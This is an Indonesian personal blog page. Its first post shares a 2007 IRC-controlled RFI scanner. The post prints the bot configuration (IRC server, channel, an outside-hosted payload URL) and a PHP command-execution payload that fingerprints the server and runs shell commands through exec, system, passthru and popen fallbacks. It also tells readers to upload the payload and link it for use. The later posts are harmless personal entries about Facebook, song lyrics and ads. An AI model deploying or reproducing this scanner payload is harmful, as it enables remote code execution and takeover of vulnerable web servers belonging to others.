Scanner RFI 2007 Code By Morgan

Yang masih cinta scanner RFI 2007 (-an ) yang pernah di perkenalkan Morgan di IndoIRC pada tahun 2007 silahkan download linknya disini.

###############CONFIGURATION###################
my $processo = “by BajoCrew”;
my $printcmd=”http://cosmeticawards.com/submit/file/mini.htm??”;
my $server=”irc.allnetwork.org”; #server irc.
my $porta=”6667″; #port server irc.
my $nick=”KuranjieScan69″; #nickbot
my $chan=”#kuranjie”; #chan results
###############END OF CONFIGURATION############

my $cmd=”http://your.link.com/cmd.txt?”; #codenya dibawah ini

<?
$dir = @getcwd();
$ker = @php_uname();
echo “31337<br>”;
$OS = @PHP_OS;
echo “<br>OSTYPE:$OS<br>”;
echo “<br>Kernel:$ker<br>”;
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo “Free:”.view_size($free).”<br>”;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 .” GB”;}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 .” MB”;}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 .” KB”;}
else {$size = $size . ” B”;}
return $size;
}

Code $cmd diatas silahkan di upload ke hosting kamu trus linknya masukkan ke : my $cmd=”http://your.link.com/cmd.txt?&#8221;

Silahkan mencoba mudah-mudahan source nya masih bagus 😀

Published in: on Januari 21, 2010 at 2:23 am  Comments (2)  
Tags: , , , , , , ,

“Teman” Lama

kawan lama

Ada 1 friend request di facebook, pas di buka ternyata teman lama.
Ga’ nyangka bisa ketemu lagi walau di media yang lain 😀

Hallo “Teman Lama” pa kabar?
Senang bisa ketemu lagi 😀

Published in: on Oktober 16, 2009 at 2:25 pm  Tinggalkan sebuah Komentar  
Tags: ,

Kangen

Kangen lagu d’masiv akhirnya minta petunjuk mbah Google. Dapat deh nich lagu,

D’Masiv – Merindukanmu

Saat aku tertawa diatas semua
Saat aku menangisi kesedihanku

Aku ingin engkau selalu ada
Aku ingin engkau aku kenang

Reff:
Selama aku masih bisa bernafas
Masih sanggup berjalan kukan slalu memujamu
Meski ku tak tahu lagi engkau ada dimana
Dengarkanlah aku kumerindukanmu

Saat aku mencoba merubah segalanya
Saat aku meratapi kekalahanku

Aku ingin engkau selalu ada
Aku ingin engkau aku kenang

Waktu lagi dengerin tuh lagu, jadi kangen seseorang 😦 terus buka facebooknya. Nich potonya

I miss U so much. Kenapa waktu begitu cepat berlalu. Dan menjauhkan kita tanpa perpisahan. 😦

Published in: on Oktober 13, 2009 at 10:45 am  Comments (6)  
Tags: , , , , , , ,

Ads di Facebook

Ads Facebook

Iseng-iseng klik Create an Ad di profile facebook. Awalnya sih nyangka gratis gitu 😛 (hari gini gratis?). Pas udah selesai ngisi form nya muncul gambar ini,

Ads Facebook

Kirain dah komplit, pas lihat ke bawah ada gambar kayak gini,

Ads Facebook

Hahahaha… ngeri cuy…. gagal maning… 😀

Published in: on Oktober 12, 2009 at 4:02 pm  Comments (1)  
Tags: , , ,